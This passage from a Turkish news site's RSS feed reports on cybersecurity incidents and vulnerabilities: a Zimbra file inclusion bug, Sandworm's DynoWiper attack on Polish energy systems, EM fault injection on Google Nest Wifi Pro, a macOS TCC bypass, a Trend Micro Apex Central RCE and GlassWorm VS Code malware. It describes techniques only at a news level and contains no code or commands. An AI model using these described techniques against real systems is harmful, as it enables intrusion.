<p data-start="2586" data-end="2711">Etkilenen sürümlerin <strong data-start="2607" data-end="2642">8.10.1, 9.1.1, 10.1.6 ve 10.1.7</strong> olduğu ve zararlı kodun yükleme sırasında devreye girdiği aktarıldı.</p>
<p data-start="2713" data-end="3008"><strong data-start="2713" data-end="2757">Zimbra Webmail’de dosya dahil etme açığı</strong><br>Aktif olarak istismar edildiği belirtilen son açık ise <strong data-start="2813" data-end="2831">CVE-2025-68645</strong> oldu. Aralık 2025’te açıklanan bu zafiyet, <strong data-start="2875" data-end="2918">Zimbra Collaboration Suite 10.0 ve 10.1</strong> sürümlerinde kullanılan Webmail Classic arayüzünde yerel dosya dahil etme imkânı sunuyor.</p>
<p data-start="3010" data-end="3148">CISA, kimlik doğrulaması olmayan saldırganların <strong data-start="3058" data-end="3069">/h/rest</strong> uç noktasını kullanarak WebRoot dizinindeki dosyalara erişebildiğini belirtti.</p>
<p data-start="3150" data-end="3509"><strong data-start="3150" data-end="3195">Federal kurumlara son tarih 12 Şubat 2026</strong><br>CISA, söz konusu açıkların <strong data-start="3223" data-end="3299">fidye yazılımı saldırılarında kullanılıp kullanılmadığının bilinmediğini</strong>, ancak tehdit seviyesinin yüksek olduğunu vurguladı. Ajans, federal kurumların <strong data-start="3379" data-end="3396">12 Şubat 2026</strong> tarihine kadar güvenlik güncellemelerini uygulamasını veya riskli ürünleri devre dışı bırakmasını zorunlu kıldı.</p>
<p data-start="3511" data-end="3643"><strong data-start="3511" data-end="3523"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Sandworm hacker grubu Polonya enerji altyapısına yönelik başarısız DynoWiper saldırısıyla ilişkilendirildi</title>
<link>https://www.ajansexpres.com.tr/sandworm-hacker-grubu-polonya-enerji-altyapisina-yoenelik-basarisiz-dynowiper-saldirisiyla-iliskilendirildi</link>
<guid>https://www.ajansexpres.com.tr/sandworm-hacker-grubu-polonya-enerji-altyapisina-yoenelik-basarisiz-dynowiper-saldirisiyla-iliskilendirildi</guid>
<description><![CDATA[ Aralık 2025’te Polonya’nın enerji altyapısını hedef alan siber saldırının arkasında, Rusya bağlantılı Sandworm hacker grubunun bulunduğu açıklandı. Saldırıda ilk kez DynoWiper adlı yeni bir veri silici zararlı yazılımın kullanıldığı, Polonya Başbakanı Donald Tusk’un saldırıların Rus servisleriyle bağlantılı olduğunu söylediği bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_697634e38a2ab.webp" length="81020" type="image/jpeg"/>
<pubDate>Sun, 25 Jan 2026 18:22:05 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>polonya enerji altyapısı siber saldırı, sandworm hacker grubu nedir, dynowiper veri silici zararlı yazılım, rusya bağlantılı siber saldırılar</media:keywords>
<content:encoded><![CDATA[<p><br>Polonya’nın enerji altyapısını hedef alan ve Aralık 2025’in son günlerinde tespit edilen siber saldırının, Rusya destekli Sandworm hacker grubuyla bağlantılı olduğu açıklandı. Güvenlik şirketi <strong data-start="688" data-end="696">ESET</strong>, 29-30 Aralık tarihlerinde gerçekleşen saldırıda <strong data-start="746" data-end="759">DynoWiper</strong> adı verilen yeni bir veri silici zararlı yazılımın kullanılmaya çalışıldığını duyurdu.</p>
<p></p>
<p data-start="848" data-end="1130">Sandworm; <strong data-start="858" data-end="898">UAC-0113, APT44 ve Seashell Blizzard</strong> adlarıyla da biliniyor ve 2009’dan bu yana faaliyet gösteriyor. Grup, Rusya Federasyonu Askerî İstihbarat Teşkilatı GRU’ya bağlı <strong data-start="1028" data-end="1055">74455 numaralı birlikle</strong> ilişkilendiriliyor ve geçmişte yıkıcı siber saldırılarla gündeme gelmişti.</p>
<p data-start="1132" data-end="1372">Yaklaşık on yıl önce Sandworm, Ukrayna’nın enerji şebekesine yönelik düzenlediği saldırıyla <strong data-start="1224" data-end="1273">230 bin kişinin elektrik kesintisi yaşamasına</strong> neden olmuştu. Uzmanlar, Polonya’daki girişimin bu saldırılarla benzerlik taşıdığına dikkat çekti.</p>
<p data-start="1374" data-end="1772">Polonya makamları tarafından yapılan açıklamada, saldırının <strong data-start="1434" data-end="1465">iki kojenerasyon santralini</strong> ve rüzgâr türbinleri ile güneş enerjisi santrallerinden üretilen elektriğin yönetildiği bir kontrol sistemini hedef aldığı bildirildi. Polonya Başbakanı <strong data-start="1619" data-end="1634">Donald Tusk</strong>, basın toplantısında, “Her şey bu saldırıların doğrudan Rus servisleriyle bağlantılı gruplar tarafından hazırlandığını gösteriyor.” dedi.</p>
<p data-start="1774" data-end="2120">ESET, DynoWiper hakkında sınırlı teknik detay paylaştı. Zararlı yazılımın <strong data-start="1848" data-end="1871">Win32/KillFiles.NMO</strong> olarak tespit edildiği ve <strong data-start="1898" data-end="1942">4EC3C90846AF6B79EE1A5188EEFA3FD21F6D4CF6</strong> SHA-1 özet değerine sahip olduğu aktarıldı. Ancak güvenlik araştırmacıları, zararlı yazılım örneğinin VirusTotal, Any.Run ve benzeri platformlarda henüz bulunamadığını kaydetti.</p>
<p data-start="2122" data-end="2352">Veri silici zararlı yazılımlar, dosya sistemini tarayarak verileri geri dönülmez şekilde siliyor ve sistemleri kullanılamaz hâle getiriyor. Bu tür saldırılardan sonra sistemlerin genellikle yedeklerden yeniden kurulması gerekiyor.</p>
<p data-start="2354" data-end="2630">Saldırganların Polonya sistemlerinde ne kadar süre kaldığı ve ilk erişimi nasıl sağladığı netlik kazanmazken, <strong data-start="2464" data-end="2526">Team Cymru Kıdemli Tehdit İstihbarat Danışmanı Will Thomas</strong>, savunma ekiplerine Microsoft’un <strong data-start="2560" data-end="2607">Şubat 2025’te yayımladığı Sandworm raporunu</strong> incelemelerini önerdi.</p>
<p data-start="2632" data-end="2799">Sandworm grubu, son olarak <strong data-start="2659" data-end="2734">Haziran ve Eylül 2025’te Ukrayna’nın eğitim, kamu ve tahıl sektörlerini</strong> hedef alan yıkıcı veri silme saldırılarıyla ilişkilendirilmişti.</p>
<p data-start="2801" data-end="2957"><strong data-start="2801" data-end="2813"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Google Nest Wifi Pro’da Donanım Alarmı EM Glitching ile Qualcomm IPQ5018 üzerinde en yüksek ayrıcalık seviyesi ele geçirildi</title>
<link>https://www.ajansexpres.com.tr/google-nest-wifi-proda-donanim-alarmi-em-glitching-ile-qualcomm-ipq5018-uzerinde-en-yuksek-ayricalik-seviyesi-ele-gecirildi</link>
<guid>https://www.ajansexpres.com.tr/google-nest-wifi-proda-donanim-alarmi-em-glitching-ile-qualcomm-ipq5018-uzerinde-en-yuksek-ayricalik-seviyesi-ele-gecirildi</guid>
<description><![CDATA[ Güvenlik araştırmacıları Cristofaro Mune ve Niek Timmers, Google Nest Wifi Pro cihazında kullanılan Qualcomm IPQ5018 SoC üzerinde yürüttükleri çalışmada, elektromanyetik hata enjeksiyonu saldırısıyla Secure Monitor seviyesinde kod yürütmenin mümkün olduğunu ortaya koydu. Araştırma, fiziksel erişim sağlandığında donanım tabanlı güvenlik katmanlarının da aşılabildiğini gösteriyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_697553f742333.webp" length="50554" type="image/jpeg"/>
<pubDate>Sun, 25 Jan 2026 02:21:40 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>google nest wifi pro em glitching saldırısı, qualcomm ipq5018 güvenlik açığı, secure monitor el3 ele geçirilmesi, emfi donanım saldırısı</media:keywords>
<content:encoded><![CDATA[<p><br>Google Nest Wifi Pro cihazlarında kullanılan <strong data-start="588" data-end="623">Qualcomm IPQ5018 sistem-çipinin</strong>, elektromanyetik hata enjeksiyonu saldırılarına karşı yeterli fiziksel direnç göstermediği ortaya çıktı. Güvenlik araştırmacıları <strong data-start="754" data-end="789">Cristofaro Mune ve Niek Timmers</strong>, yürüttükleri çok aşamalı çalışmada, cihazın en yüksek ayrıcalık seviyesi olan <strong data-start="869" data-end="891">EL3 Secure Monitor</strong> bağlamında keyfi kod yürütmeyi başardıklarını açıkladı.</p>
<p></p>
<p data-start="949" data-end="1356">Araştırma, üç bölüm halinde yayımlandı. İlk bölümde çipin <strong data-start="1007" data-end="1052">EMFI saldırılarına karşı karakterizasyonu</strong>, ikinci bölümde <strong data-start="1069" data-end="1132">Secure Monitor içinde rastgele okuma ve yazma elde edilmesi</strong>, üçüncü bölümde ise <strong data-start="1153" data-end="1191">EL3 seviyesinde kalıcı kod yürütme</strong> ayrıntıları paylaşıldı. Araştırmacılar, “Amaç, donanım tabanlı güvenlik mekanizmalarının gerçek dünyada ne kadar dayanıklı olduğunu ölçmekti.” ifadelerini kullandı.</p>
<p data-start="1358" data-end="1752"><strong data-start="1358" data-end="1410">Elektromanyetik Hata Enjeksiyonu Nasıl Çalışıyor</strong><br>EMFI yöntemi, işlemci üzerine çok kısa süreli ve yüksek enerjili elektromanyetik darbeler uygulanmasına dayanıyor. Bu darbeler sayesinde işlemcinin yürüttüğü talimatların bozulabildiği belirtiliyor. Araştırmacılar, “Bir kontrol talimatı atlanabiliyor ya da beklenen işlem yerine farklı bir komut yürütülebiliyor.” değerlendirmesinde bulundu.</p>
<p data-start="1754" data-end="2217"><strong data-start="1754" data-end="1794">Secure Monitor Kontrolleri Atlatıldı</strong><br>Çalışmanın ikinci aşamasında, Secure Monitor tarafından uygulanan adres doğrulama mekanizmalarının hedef alındığı aktarıldı. Normal şartlarda yalnızca izin verilen bellek alanlarına erişim sağlayan <strong data-start="1993" data-end="2015">is_allowed_address</strong> benzeri kontrollerin, doğru zamanlamayla yapılan EMFI saldırıları sonucunda devre dışı bırakılabildiği kaydedildi. Bu sayede, <strong data-start="2142" data-end="2191">EL3 bağlamında rastgele 32 bit okuma ve yazma</strong> yapılabildiği vurgulandı.</p>
<p data-start="2219" data-end="2628"><strong data-start="2219" data-end="2254">XPU Yapılandırması Değiştirildi</strong><br>Araştırmanın en kritik aşamasında, TrustZone adres alanlarını koruyan <strong data-start="2325" data-end="2350">XPU yapılandırmasının</strong> yeniden programlanabildiği belirtildi. Araştırmacılar, “Tek bir başarılı glitch, Secure Monitor içinde keyfi uzunlukta kod yürütmek için yeterli.” ifadesini kullandı. Bu durumun, cihazın en korumalı yazılım katmanının tamamen kontrol altına alınması anlamına geldiği aktarıldı.</p>
<p data-start="2630" data-end="3004"><strong data-start="2630" data-end="2656">Saldırı Zor Ama Mümkün</strong><br>Araştırmacılar, saldırının pratikte yüksek beceri, hassas ekipman ve uzun deneme süreleri gerektirdiğini belirtti. Ortalama başarı süresinin <strong data-start="2798" data-end="2818">30 ila 40 dakika</strong> arasında değiştiği, çok sayıda yeniden başlatma ve zamanlama denemesi gerektiği kaydedildi. Buna rağmen, elde edilen sonucun teorik değil, pratik olarak uygulanabilir olduğu vurgulandı.</p>
<p data-start="3006" data-end="3416"><strong data-start="3006" data-end="3038">Donanım Güvenliği Tartışması</strong><br>Çalışma, gömülü ağ cihazlarında yalnızca yazılımsal önlemlerin yeterli olmayabileceğini ortaya koydu. Araştırmacılar, “TrustZone ve Secure Monitor gibi donanım destekli güvenlik katmanları bile fiziksel saldırılar karşısında aşılabilir.” değerlendirmesinde bulundu. Fiziksel erişim sağlanan cihazlarda, en yüksek ayrıcalık seviyesinin dahi ele geçirilebileceği uyarısı yapıldı.</p>
<p data-start="3418" data-end="3565"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>macOS’ta Kritik Güvenlik Açığı Ortaya Çıktı: “TCC Koruması Tamamen Aşılabiliyor”</title>
<link>https://www.ajansexpres.com.tr/macosta-kritik-guvenlik-acigi-ortaya-cikti-tcc-korumasi-tamamen-asilabiliyor</link>
<guid>https://www.ajansexpres.com.tr/macosta-kritik-guvenlik-acigi-ortaya-cikti-tcc-korumasi-tamamen-asilabiliyor</guid>
<description><![CDATA[ Apple’ın masaüstü işletim sistemi macOS’ta tespit edilen ve CVE-2025-43530 koduyla izlenen kritik güvenlik açığı, saldırganların Transparency, Consent and Control mekanizmasını tamamen devre dışı bırakmasına olanak tanıyor. Açık, kullanıcıdan izin almadan hassas verilere erişim sağlanmasına neden olurken Apple, macOS 26.2 sürümüyle sorunun giderildiğini duyurdu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_696f1fe4046ec.webp" length="52066" type="image/jpeg"/>
<pubDate>Tue, 20 Jan 2026 09:26:10 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>macos tcc güvenlik açığı nedir, cve-2025-43530 nasıl çalışıyor, macos 26.2 güvenlik güncellemesi, apple tcc bypass zafiyeti</media:keywords>
<content:encoded><![CDATA[<p>Apple’ın macOS işletim sisteminde tespit edilen <strong data-start="530" data-end="555">kritik güvenlik açığı</strong>, kullanıcı gizliliğini korumak amacıyla geliştirilen <strong data-start="609" data-end="653">Transparency, Consent, and Control (TCC)</strong> mekanizmasının tamamen aşılmasına yol açtı. <strong data-start="698" data-end="716">CVE-2025-43530</strong> olarak kayda geçen zafiyetin, herhangi bir yönetici yetkisi gerektirmeden istismar edilebildiği bildirildi.</p>
<p></p>
<p data-start="826" data-end="1169"><strong data-start="826" data-end="868">VoiceOver Çerçevesi Üzerinden İstismar</strong><br>Güvenlik araştırmacıları, açığın <strong data-start="902" data-end="927">VoiceOver framework’ü</strong> ve <strong data-start="931" data-end="950">com.apple.scrod</strong> adlı sistem servisi üzerinden tetiklendiğini belirtti. Bu yöntemle saldırganların, Apple tarafından imzalanmış süreçlere kod enjekte edebildiği ve bu süreçler aracılığıyla <strong data-start="1123" data-end="1155">AppleScript çalıştırabildiği</strong> ifade edildi.</p>
<p data-start="1171" data-end="1641"><strong data-start="1171" data-end="1212">TOCTOU Yarış Koşulu ile Tam TCC Aşımı</strong><br>İstismarın temelinde, <strong data-start="1235" data-end="1273">Time-of-Check-Time-of-Use (TOCTOU)</strong> türü bir yarış koşulunun yer aldığı kaydedildi. Kod enjeksiyonu ile bu yarış koşulunun birlikte kullanılması sonucunda, saldırganların <strong data-start="1409" data-end="1538">Finder ile etkileşime girebildiği, dosya okuyabildiği, mikrofona erişebildiği ve keyfi AppleScript komutları çalıştırabildiği</strong> aktarıldı. Tüm bu işlemlerin kullanıcıya herhangi bir bildirim gönderilmeden gerçekleştiği vurgulandı.</p>
<p data-start="1643" data-end="1974"><strong data-start="1643" data-end="1683">Apple: Açık macOS 26.2 ile Kapatıldı</strong><br>Apple, güvenlik açığının <strong data-start="1709" data-end="1723">macOS 26.2</strong> sürümünde giderildiğini duyurdu. Şirket, <strong data-start="1765" data-end="1806">com.apple.private.accessibility.scrod</strong> yetkisinin artık <strong data-start="1824" data-end="1847">process audit token</strong> üzerinden doğrulandığını ve bu sayede hem kod enjeksiyonu açığının hem de TOCTOU penceresinin ortadan kaldırıldığını açıkladı.</p>
<p data-start="1976" data-end="2294"><strong data-start="1976" data-end="2012">Kullanıcılara Güncelleme Çağrısı</strong><br>Apple, kullanıcıların sistemlerini en kısa sürede güncellemelerini önerdi. Güncellemenin, <strong data-start="2103" data-end="2148">macOS → System Settings → Software Update</strong> adımları izlenerek yapılabileceği hatırlatıldı. Güvenlik uzmanları, açığın kapsamı nedeniyle güncellemenin geciktirilmemesi gerektiğini belirtti.</p>
<p data-start="2296" data-end="2430"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>17,5 Milyon Instagram Hesabına Ait Verilerin Satışa Çıkarıldığı İddiası Güvenlik Endişesi Yarattı</title>
<link>https://www.ajansexpres.com.tr/175-milyon-instagram-hesabina-ait-verilerin-satisa-cikarildigi-iddiasi-guvenlik-endisesi-yaratti</link>
<guid>https://www.ajansexpres.com.tr/175-milyon-instagram-hesabina-ait-verilerin-satisa-cikarildigi-iddiasi-guvenlik-endisesi-yaratti</guid>
<description><![CDATA[ Bir siber suç forumunda paylaşılan ilana göre, 2024 yılı boyunca toplandığı öne sürülen ve 17,5 milyon Instagram hesabıyla ilişkilendirilen veriler satışa çıkarıldı. 7 Ocak 2026’da listelendiği belirtilen veri setine ilişkin Meta’dan henüz resmi bir açıklama yapılmadı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_69652e5647645.webp" length="51504" type="image/jpeg"/>
<pubDate>Mon, 12 Jan 2026 20:25:22 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>instagram veri satışı iddiası, 17.5 milyon instagram hesabı verisi, instagram api güvenlik açığı, meta veri ihlali açıklaması</media:keywords>
<content:encoded><![CDATA[<p>Siber güvenlik çevrelerinde paylaşılan bilgilere göre, bir tehdit aktörü <strong data-start="489" data-end="556">17,5 milyon Instagram hesabına ait olduğu iddia edilen verileri</strong> satışa çıkardığını duyurdu. İlanın, yeraltı bir hacking forumunda yayımlandığı ve verilerin <strong data-start="649" data-end="720">2024 yılı içerisinde olası bir API maruziyeti yoluyla toplandığının</strong> öne sürüldüğü belirtildi.</p>
<p></p>
<p data-start="748" data-end="994">Paylaşımda yer alan bilgilere göre söz konusu veri seti <strong data-start="804" data-end="819">7 Ocak 2026</strong> tarihinde satış listesine eklendi. Konuya ilişkin uyarılar ve güvenlik tartışmaları ise <strong data-start="908" data-end="923">9 Ocak 2026</strong> itibarıyla kamuoyunda ve siber güvenlik topluluklarında gündeme geldi.</p>
<p data-start="996" data-end="1350"><strong data-start="996" data-end="1025">İddia Edilen Veri İçeriği</strong><br>Satışa çıkarıldığı öne sürülen veri setinde, <strong data-start="1071" data-end="1187">kullanıcı adları, kullanıcı kimlik numaraları, e-posta adresleri, telefon numaraları ve kısmi konum bilgilerinin</strong> yer aldığı ifade edildi. Paylaşılan bilgilerde parola verilerinin bulunmadığı belirtilse de, uzmanlar bu tür bilgilerin ciddi riskler barındırdığına dikkat çekti.</p>
<p data-start="1352" data-end="1708"><strong data-start="1352" data-end="1389">Hesap Güvenliği Açısından Riskler</strong><br>Siber güvenlik uzmanları, parola içermeyen veri setlerinin dahi <strong data-start="1454" data-end="1539">şifre sıfırlama girişimleri, sosyal mühendislik saldırıları ve SIM kart kopyalama</strong> gibi yöntemlerle kötüye kullanılabileceğini vurguladı. Bu tür veri kümelerinin, kullanıcıları hedef alan daha karmaşık saldırıların temelini oluşturabildiği kaydedildi.</p>
<p data-start="1710" data-end="1998"><strong data-start="1710" data-end="1742">Meta’dan Açıklama Bekleniyor</strong><br>İddialara ilişkin olarak Meta tarafından şu ana kadar resmi bir doğrulama veya yalanlama yapılmadığı bildirildi. Güvenlik çevreleri, olayın doğrudan yeni bir ihlalden ziyade <strong data-start="1917" data-end="1962">eski verilerin yeniden dolaşıma sokulması</strong> ihtimalini de değerlendirmeye aldı.</p>
<p data-start="2000" data-end="2283"><strong data-start="2000" data-end="2023">Kullanıcılara Uyarı</strong><br>Uzmanlar, Instagram kullanıcılarına <strong data-start="2060" data-end="2145">kimlik doğrulayıcı uygulama ile iki faktörlü kimlik doğrulamayı etkinleştirmeleri</strong>, hesaplarında olağandışı hareketleri takip etmeleri ve <strong data-start="2201" data-end="2255">resmi olmayan destek mesajlarına itibar etmemeleri</strong> yönünde uyarılarda bulundu.</p>
<p data-start="2285" data-end="2421"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Trend Micro Apex Central’da Kritik RCE Açığı Alarmı: CVSS 9.8 ile Sistem Yetkileri Ele Geçirilebiliyor</title>
<link>https://www.ajansexpres.com.tr/trend-micro-apex-centralda-kritik-rce-acigi-alarmi-cvss-98-ile-sistem-yetkileri-ele-gecirilebiliyor</link>
<guid>https://www.ajansexpres.com.tr/trend-micro-apex-centralda-kritik-rce-acigi-alarmi-cvss-98-ile-sistem-yetkileri-ele-gecirilebiliyor</guid>
<description><![CDATA[ Trend Micro Apex Central’ın Windows tabanlı on-premise sürümünde tespit edilen kritik bir güvenlik açığı, kimlik doğrulama gerektirmeden uzaktan kod çalıştırılmasına olanak tanıyor. CVE-2025-69258 koduyla izlenen açık, saldırganlara SYSTEM yetkileriyle tam kontrol sağlama riski taşıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_69652dad54b98.webp" length="69220" type="image/jpeg"/>
<pubDate>Mon, 12 Jan 2026 20:22:09 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>trend micro apex central rce açığı, cve-2025-69258 nedir, msgreceiver exe güvenlik zafiyeti, cvss 9.8 kritik açık</media:keywords>
<content:encoded><![CDATA[<p><br>Siber güvenlik firması Trend Micro’nun Apex Central adlı merkezi yönetim çözümünde <strong data-start="522" data-end="574">kritik seviyede bir uzaktan kod çalıştırma açığı</strong> tespit edildi. <strong data-start="590" data-end="608">CVE-2025-69258</strong> koduyla kayda geçen güvenlik açığının <strong data-start="647" data-end="665">CVSS skoru 9.8</strong> olarak açıklandı.</p>
<p></p>
<p data-start="685" data-end="997">Açığın, <strong data-start="693" data-end="772">Windows işletim sistemlerinde çalışan on-premise Apex Central kurulumlarını</strong> etkilediği bildirildi. Güvenlik zafiyetinin, <strong data-start="818" data-end="846">MsgReceiver.exe bileşeni</strong> üzerinden tetiklendiği ve <strong data-start="873" data-end="890">LoadLibraryEx</strong> fonksiyonunun kötüye kullanılmasıyla saldırgan kontrollü bir DLL dosyasının sisteme yüklendiği belirtildi.</p>
<p data-start="999" data-end="1334"><strong data-start="999" data-end="1033">Kimlik Doğrulama Gerektirmiyor</strong><br>Paylaşılan teknik detaylara göre saldırganın herhangi bir kullanıcı hesabına veya yetkilendirmeye ihtiyaç duymadığı aktarıldı. Uzaktan ve kimliği doğrulanmamış bir saldırganın, <strong data-start="1211" data-end="1250">0x0a8d (SC_INSTALL_HANDLER_REQUEST)</strong> kodlu özel hazırlanmış bir mesaj göndererek açığı istismar edebildiği ifade edildi.</p>
<p data-start="1336" data-end="1702"><strong data-start="1336" data-end="1376">SYSTEM Yetkileriyle Çalıştırma Riski</strong><br>Açığın başarılı şekilde kullanılması durumunda, zararlı kodun <strong data-start="1439" data-end="1462">SYSTEM yetkileriyle</strong> çalıştırılabildiği ve bunun da etkilenen sunucu üzerinde <strong data-start="1520" data-end="1535">tam kontrol</strong> anlamına geldiği kaydedildi. Bu durumun veri sızıntısı, kalıcı arka kapı oluşturma ve ağ içi yatay hareket gibi ileri seviye saldırılara zemin hazırladığı vurgulandı.</p>
<p data-start="1704" data-end="2060"><strong data-start="1704" data-end="1741">Trend Micro’dan Acil Yama Çağrısı</strong><br>Trend Micro, söz konusu güvenlik açığına karşı <strong data-start="1789" data-end="1828">güvenlik yamalarının yayımlandığını</strong> duyurdu. Şirket, tüm kurumlara on-premise Apex Central kurulumlarını acilen güncellemeleri, <strong data-start="1921" data-end="1988">MsgReceiver.exe ile ilişkili olağandışı aktiviteleri izlemeleri</strong> ve sistem günlüklerini detaylı biçimde incelemeleri çağrısında bulundu.</p>
<p data-start="2062" data-end="2186"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>İran Starlink’e Askeri Karıştırma Uyguladı: Ülke Genelindeki İnternet Kesintisi Uydu Ağlarına Taşındı</title>
<link>https://www.ajansexpres.com.tr/iran-starlinke-askeri-karistirma-uyguladi-ulke-genelindeki-internet-kesintisi-uydu-aglarina-tasindi</link>
<guid>https://www.ajansexpres.com.tr/iran-starlinke-askeri-karistirma-uyguladi-ulke-genelindeki-internet-kesintisi-uydu-aglarina-tasindi</guid>
<description><![CDATA[ İran’da devam eden internet kısıtlamaları yeni bir boyut kazandı. İlk kez askeri düzeyde karıştırma yöntemleri kullanıldığı bildirilen müdahaleyle, Starlink uydu internet hizmetinin ülkedeki trafiğinin yüzde 80’den fazlası saatler içinde devre dışı kaldı. Gelişme, protestocular ve aktivistler için kritik bir alternatif erişim kanalının da kapatıldığı şeklinde değerlendirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_69652be325cdd.webp" length="68886" type="image/jpeg"/>
<pubDate>Mon, 12 Jan 2026 20:14:50 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>iran starlink internet kesintisi, iran askeri karıştırma starlink, iran internet blackout uydu, starlink iran protestolar</media:keywords>
<content:encoded><![CDATA[<p>İran’da uygulanan internet kesintileri, bu kez ülke içi altyapının ötesine taşındı. Uluslararası internet izleme kuruluşları ve teknik kaynakların aktardığı bilgilere göre, İran yönetimi <strong data-start="704" data-end="800">ilk kez askeri karıştırma sistemleri kullanarak Starlink uydu internet hizmetini hedef aldı.</strong></p>
<p></p>
<p data-start="802" data-end="1050">Saatler içinde gerçekleşen müdahalenin ardından, <strong data-start="851" data-end="932">İran sınırları içindeki Starlink trafiğinin yüzde 80’den fazlasının kesildiği</strong> tespit edildi. Uzmanlar, bu oranın kısa sürede ülke genelinde uydu bağlantılarını işlevsiz hale getirdiğini belirtti.</p>
<p data-start="1052" data-end="1384"><strong data-start="1052" data-end="1097">Protestolar Sırasında Kritik Alternatifti</strong><br>Starlink, önceki internet kesintileri sırasında özellikle protestocular, aktivistler ve gazeteciler için <strong data-start="1203" data-end="1265">devlet kontrolündeki ağlara alternatif bir iletişim kanalı</strong> olarak kullanılıyordu. Yeni karıştırma hamlesiyle birlikte bu seçeneğin de büyük ölçüde devre dışı kaldığı kaydedildi.</p>
<p data-start="1386" data-end="1681"><strong data-start="1386" data-end="1419">Askeri Düzeyde Yeni Bir Aşama</strong><br>Siber güvenlik uzmanları, kullanılan yöntemin sivil karartmaların ötesinde, <strong data-start="1496" data-end="1542">askeri seviyede elektronik harp kapasitesi</strong> gerektirdiğine dikkat çekti. Bu durum, İran’ın internet kontrol stratejisinde yeni ve daha sert bir aşamaya geçildiği şeklinde yorumlandı.</p>
<p data-start="1981" data-end="2113"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Yeni GlassWorm Zararlı Yazılım Dalgası macOS Sistemleri Trojenli Kripto Cüzdanlarla Hedef Alıyor</title>
<link>https://www.ajansexpres.com.tr/yeni-glassworm-zararli-yazilim-dalgasi-macos-sistemleri-trojenli-kripto-cuzdanlarla-hedef-aliyor</link>
<guid>https://www.ajansexpres.com.tr/yeni-glassworm-zararli-yazilim-dalgasi-macos-sistemleri-trojenli-kripto-cuzdanlarla-hedef-aliyor</guid>
<description><![CDATA[ GlassWorm adlı zararlı yazılımın dördüncü dalgası, macOS kullanan geliştiricileri hedef alıyor. OpenVSX ve Visual Studio Marketplace üzerinden yayılan kötü amaçlı VS Code eklentileri, kripto cüzdan uygulamalarının trojenli sürümlerini dağıtarak kimlik bilgileri, geliştirici hesapları ve dijital varlıkları ele geçirmeyi amaçlıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202601/image_870x580_695d87b409e15.webp" length="34316" type="image/jpeg"/>
<pubDate>Wed, 07 Jan 2026 01:08:08 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>glassworm zararlı yazılım nedir, macos vscode zararlı eklentiler, trojenli kripto cüzdan saldırısı, openvsx güvenlik uyarısı</media:keywords>
<content:encoded><![CDATA[<p>Siber güvenlik araştırmacıları, <strong data-start="497" data-end="560">GlassWorm zararlı yazılım kampanyasının dördüncü dalgasının</strong> macOS sistemleri hedef aldığını ortaya koydu. Koi Security tarafından tespit edilen yeni saldırı dalgasında, OpenVSX kayıt defterinde yayımlanan kötü amaçlı VS Code eklentileri üzerinden <strong data-start="748" data-end="787">trojenli kripto cüzdan uygulamaları</strong> dağıtılıyor.</p>
<p></p>
<p data-start="802" data-end="1188">GlassWorm ilk kez ekim ayında ortaya çıktı. Zararlı yazılım, <strong data-start="863" data-end="895">görünmez Unicode karakterler</strong> kullanılarak gizlenen eklentiler aracılığıyla GitHub, npm ve OpenVSX hesap bilgilerini, ayrıca tarayıcı tabanlı kripto cüzdan verilerini ele geçirmeyi hedefledi. Önceki dalgalarda Windows sistemler odak alınırken, son kampanyada yalnızca <strong data-start="1134" data-end="1160">macOS kullanıcılarının</strong> hedef seçildiği bildirildi.</p>
<p data-start="1190" data-end="1581"><strong data-start="1190" data-end="1233">Yeni Saldırı Yöntemi ve Teknik Detaylar</strong><br>Araştırmacılara göre son dalgada, önceki sürümlerde kullanılan Unicode gizleme veya Rust tabanlı ikililer yerine, <strong data-start="1348" data-end="1387">AES-256-CBC ile şifrelenmiş bir yük</strong> derlenmiş JavaScript kodu içine gömülüyor. Zararlı eklentilerin, kurulumu takip eden <strong data-start="1473" data-end="1500">15 dakikalık gecikmeyle</strong> çalıştığı ve bu yöntemin analiz ortamlarından kaçınmayı amaçladığı ifade edildi.</p>
<p data-start="1583" data-end="1861">GlassWorm’un yeni sürümü, PowerShell yerine <strong data-start="1627" data-end="1642">AppleScript</strong> kullanıyor ve kalıcılık için Windows Kayıt Defteri yerine <strong data-start="1701" data-end="1717">LaunchAgents</strong> mekanizmasından yararlanıyor. Komuta-kontrol altyapısında ise önceki kampanyalarda da kullanılan <strong data-start="1815" data-end="1850">Solana blokzinciri tabanlı yapı</strong> korunuyor.</p>
